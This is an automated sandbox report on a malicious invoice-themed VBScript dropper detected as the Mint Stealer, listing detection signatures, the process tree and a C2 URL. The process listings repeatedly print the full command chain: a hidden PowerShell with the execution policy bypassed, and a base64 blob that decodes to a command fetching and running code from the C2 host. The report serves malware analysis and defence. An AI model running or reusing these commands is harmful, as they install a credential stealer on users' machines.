Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fattura (5).vbs

Overview

General Information

Sample name:Fattura (5).vbs
Analysis ID:1557836
MD5:6ed67d1744f343d34071c5d3a6fb3846
SHA1:4468aa5434514007ec48cad348c8e8a882ce01c3
SHA256:4a6fdaf2e12c9e573006a2f5bd79f1283a9f316faba45f29e413e5dcb71d0ea3
Tags:rigzuvzi3bnz3-topvbsuser-JAMESWT_MHT
Infos:

Detection

Mint Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Found suspicious powershell code related to unpacking or dynamic code loading
Queries Google from non browser process on port 80
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7520 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7920 cmdline: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8080 cmdline: "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8096 cmdline: powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\eGsnEKfw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiRrMnNoS1Y5b2JZaTVVV3VSVFFMT2l0bWFnM2piID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCA1IHwgJSB7W2NoYXJdJF99KSk7CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCk7CiRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCA9IDM7CklmICgkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyICsgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCAtZ3QgNTkpIHsKICAgICRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gJFIzVFkwYXYzd0ZHaXZibWNKcThBRWJJOHV5WGRkR2hYM0E2MjMxTmdVN0V6SHJzSzd1dVAgKyAxOwogICAgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciA9ICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgKyAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyQWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyID0gJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciArICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHJBZGQ7Cn07CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskUjNUWTBhdjN3RkdpdmJtY0pxOEFFYkk4dXlYZGRHaFgzQTYyMzFOZ1U3RXpIcnNLN3V1UH07CiRndERRODJOZjhVeWwwUnJlYTNqNW9BSTRTS053NnBoOVZmd0tTVnpucEFqNUNhdVBsZDdpZ2xia1lpZ1cgPSAkKC1qb2luICgoNjUuLjkwKSArICg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IDEyIHwgJSB7W2NoYXJdJF99KSk7CiRyZ2VUNEtCeHhLdUdnYUExdjVzd3lwID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJGd0RFE4Mk5mOFV5bDBScmVhM2o1b0FJNFNLTnc2cGg5VmZ3S1NWem5wQWo1Q2F1UGxkN2lnbGJrWWlnVykucHMxIiAtRm9yY2UgCiJAOwoKInBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1jICQoJHJnZVQ0S0J4eEt1R2dhQTF2NXN3eXApIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRndERRODJOZjhVeWwwUnJlYTNqNW9BSTRTS053NnBoOVZmd0tTVnpucEFqNUNhdVBsZDdpZ2xia1lpZ1cpLnBzMSI7CnBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1GaWxlIEM6XFVzZXJzXFB1YmxpY1xEb2N1bWVudHNcJCgkZ3REUTgyTmY4VXlsMFJyZWEzajVvQUk0U0tOdzZwaDlWZndLU1Z6bnBBajVDYXVQbGQ3aWdsYmtZaWdXKS5wczEKUmVtb3ZlLUl0ZW0gIiRlbnY6QVBQREFUQVwqLnBzMSIgLUZvcmNlClJlbW92ZS1JdGVtICIkZW52OkFQUERBVEFcKi5iYXQiIC1Gb3JjZQo=')) | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 5288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 5968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
{"C2 url": "http://rigzuvzi3bnz3.top/1.php?s=mints13"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\eGsnEKfw.ps1JoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2251668547.000002CF1814F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
      00000008.00000002.2252974617.000002CF19971000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
        00000008.00000002.2252974617.000002CF184CF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
          Process Memory Space: powershell.exe PID: 8096INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x1596a:$b2: ::FromBase64String(
          • 0x1646b:$b2: ::FromBase64String(
          • 0x182d9:$b2: ::FromBase64String(
          • 0x1b5ad:$b2: ::FromBase64String(
          • 0x1c1f1:$b2: ::FromBase64String(
          • 0x1d8cd:$b2: ::FromBase64String(
          • 0x3b2bc:$b2: ::FromBase64String(
          • 0xa60a3:$b2: ::FromBase64String(
          • 0xb1b05:$b2: ::FromBase64String(
          • 0xb268e:$b2: ::FromBase64String(
          • 0xb333a:$b2: ::FromBase64String(
          • 0xb3e7c:$b2: ::FromBase64String(
          • 0x15949:$b3: ::UTF8.GetString(
          • 0x1644a:$b3: ::UTF8.GetString(
          • 0x182b8:$b3: ::UTF8.GetString(
          • 0x1b58c:$b3: ::UTF8.GetString(
          • 0x1c1d0:$b3: ::UTF8.GetString(
          • 0x1d8ac:$b3: ::UTF8.GetString(
          • 0x3b29b:$b3: ::UTF8.GetString(
          • 0xa6082:$b3: ::UTF8.GetString(
          • 0xb1ae4:$b3: ::UTF8.GetString(
          Process Memory Space: powershell.exe PID: 8176JoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_8096.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
              amsi64_8176.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                amsi64_8176.amsi.csvJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiRrMnNoS1Y5b2JZaTVVV3VSVFFMT2l0bWFnM2piID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCA1IHwgJSB7W2NoYXJdJF99KSk7CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCk7CiRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCA9IDM7CklmICgkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyICsgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCAtZ3QgNTkpIHsKICAgICRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gJFIzVFkwYXYzd0ZHaXZibWNKcThBRWJJOHV5WGRkR2hYM0E2MjMxTmdVN0V6SHJzSzd1dVAgKyAxOwogICAgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciA9ICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgKyAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyQWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyID0gJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciArICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHJBZGQ7Cn07CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskUjNUWTBhdjN3RkdpdmJtY0pxOEFFYkk4dXlYZGRHaFgzQTYyMzFOZ1U3RXpIcnNLN3V1UH07CiRndERRODJOZjhVeWwwUnJlYTNqNW9BSTRTS053NnBoOVZmd0tTVnpucEFqNUNhdVBsZDdpZ2xia1lpZ1cgPSAkKC1qb2luICgoNjUuLjkwKSArICg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IDEyIHwgJSB7W2NoYXJdJF99KSk7CiRyZ2VUNEtCeHhLdUdnYUExdjVzd3lwID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJGd0RFE4Mk5mOFV5bDBScmVhM2o1b0FJNFNLTnc2cGg5VmZ3S1NWem5wQWo1Q2F1UGxkN2lnbGJrWWlnVykucHMxIiAtRm9yY2UgCiJAOwoKInBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1jICQoJHJnZVQ0S0J4eEt1R2dhQTF2NXN3eXApIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRndERRODJOZjhVeWwwUnJlYTNqNW9BSTRTS053NnBoOVZmd0tTVnpucEFqNUNhdVBsZDdpZ2xia1lpZ1cpLnBzMSI7CnBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1GaWxlIEM6XFVzZXJzXFB1YmxpY1xEb2N1bWVudHNcJCgkZ3REUTgyTmY4VXlsMFJyZWEzajVvQUk0U0tOdzZwaDlWZndLU1Z6bnBBajVDYXVQbGQ3aWdsYmtZaWdXKS5wczEKUmVtb3ZlLUl0ZW0gIiRlbnY6QVBQREFUQVwqLnBzMSIgLUZvcmNlClJlbW92ZS1JdGVtICIkZW52OkFQUERBVEFcKi5iYXQiIC1Gb3JjZQo=')) | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -Wind
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiRrMnNoS1Y5b2JZaTVVV3VSVFFMT2l0bWFnM2piID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCA1IHwgJSB7W2NoYXJdJF99KSk7CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCk7CiRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCA9IDM7CklmICgkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyICsgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCAtZ3QgNTkpIHsKICAgICRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gJFIzVFkwYXYzd0ZHaXZibWNKcThBRWJJOHV5WGRkR2hYM0E2MjMxTmdVN0V6SHJzSzd1dVAgKyAxOwogICAgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciA9ICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgKyAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyQWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyID0gJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciArICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHJBZGQ7Cn07CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskUjNUWTBhdjN3RkdpdmJtY0pxOEFFYkk4dXlYZGRHaFgzQTYyMzFOZ1U3RXpIcnNLN3V1UH07CiRndERRODJOZjhVeWwwUnJlYTNqNW9BSTRTS053NnBoOVZmd0tTVnpucEFqNUNhdVBsZDdpZ2xia1lpZ1cgPSAkKC1qb2luICgoNjUuLjkwKSArICg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IDEyIHwgJSB7W2NoYXJdJF99KSk7CiRyZ2VUNEtCeHhLdUdnYUExdjVzd3lwID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJGd0RFE4Mk5mOFV5bDBScmVhM2o1b0FJNFNLTnc2cGg5VmZ3S1NWem5wQWo1Q2F1UGxkN2lnbGJrWWlnVykucHMxIiAtRm9yY2UgCiJAOwoKInBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1jICQoJHJnZVQ0S0J4eEt
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiRrMnNoS1Y5b2JZaTVVV3VSVFFMT2l0bWFnM2piID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCA1IHwgJSB7W2NoYXJdJF99KSk7CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCk7CiRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCA9IDM7CklmICgkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyICsgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCAtZ3QgNTkpIHsKICAgICRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gJFIzVFkwYXYzd0ZHaXZibWNKcThBRWJJOHV5WGRkR2hYM0E2MjMxTmdVN0V6SHJzSzd1dVAgKyAxOwogICAgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciA9ICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgKyAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyQWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyID0gJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciArICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHJBZGQ7Cn07CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskUjNUWTBhdjN3RkdpdmJtY0pxOEFFYkk4dXlYZGRHaFgzQTYyMzFOZ1U3RXpIcnNLN3V1UH07CiRndERRODJOZjhVeWwwUnJlYTNqNW9BSTRTS053NnBoOVZmd0tTVnpucEFqNUNhdVBsZDdpZ2xia1lpZ1cgPSAkKC1qb2luICgoNjUuLjkwKSArICg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IDEyIHwgJSB7W2NoYXJdJF99KSk7CiRyZ2VUNEtCeHhLdUdnYUExdjVzd3lwID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJGd0RFE4Mk5mOFV5bDBScmVhM2o1b0FJNFNLTnc2cGg5VmZ3S1NWem5wQWo1Q2F1UGxkN2lnbGJrWWlnVykucHMxIiAtRm9yY2UgCiJAOwoKInBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1jICQoJHJnZVQ0S0J4eEt1R2dhQTF2NXN3eXApIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRndERRODJOZjhVeWwwUnJlYTNqNW9BSTRTS053NnBoOVZmd0tTVnpucEFqNUNhdVBsZDdpZ2xia1lpZ1cpLnBzMSI7CnBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1GaWxlIEM6XFVzZXJzXFB1YmxpY1xEb2N1bWVudHNcJCgkZ3REUTgyTmY4VXlsMFJyZWEzajVvQUk0U0tOdzZwaDlWZndLU1Z6bnBBajVDYXVQbGQ3aWdsYmtZaWdXKS5wczEKUmVtb3ZlLUl0ZW0gIiRlbnY6QVBQREFUQVwqLnBzMSIgLUZvcmNlClJlbW92ZS1JdGVtICIkZW52OkFQUERBVEFcKi5iYXQiIC1Gb3JjZQo=')) | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -Wind
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiRrMnNoS1Y5b2JZaTVVV3VSVFFMT2l0bWFnM2piID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCA1IHwgJSB7W2NoYXJdJF99KSk7CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCk7CiRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckFkZCA9IDM7CklmICgkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyICsgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMckF